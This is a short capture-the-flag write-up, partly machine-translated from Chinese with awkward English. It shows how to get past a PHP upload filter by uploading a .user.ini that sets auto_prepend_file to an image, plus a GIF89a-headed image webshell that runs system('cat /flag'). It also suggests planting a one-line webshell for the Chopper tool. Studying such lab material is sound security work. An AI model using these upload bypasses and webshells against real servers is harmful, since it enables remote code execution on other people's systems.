File Upload
Blacklist
Call the php exif_imagetype()
function
GIF89a can be bypassed using the file header
Filtered text content of the <?
<Script language = 'php'> <script> can be bypassed
MIME modify and use special extensions have failed
Correct posture:
Use .user.ini
.user.ini
We first seen in the php manual at the .user.ini
introduction:
That we can .user.ini
set php.ini
the PHP_INI_PERDIR and PHP_INI_USER the INI setting mode, and as long as the use of CGI / FastCGI server mode can be used.user.ini
He mentions two interesting set at p cattle article: auto_prepend_file and auto_append_file
We then looked at the manual definition of these two settings:
Roughly meaning: we specify a file (such as a.jpg), then the file will be included in the php file to be executed (eg index.php), similar to insert one in the index.php:require(./a.jpg);
The difference between these two is that just set auto_prepend_file is inserted before the file; auto_append_file at the insertion end of the file (if the file has invoked exit()
when the setting is invalid)
Seen .user.ini
after analysis of our ideas should be more clear, we can upload one of these .user.ini
:
GIF89a
auto_prepend_file=a.jpg
然后再上传一个这样的图片马a.jpg:
GIF89a
<script language='php'>system('cat /flag');</script>
使上传路径下的php文件包含a.jpg
相当于调用require()函数
访问上传路径下的php文件即可得到flag
或者可以在a.jpg里写入一句话
菜刀连接后自己找flag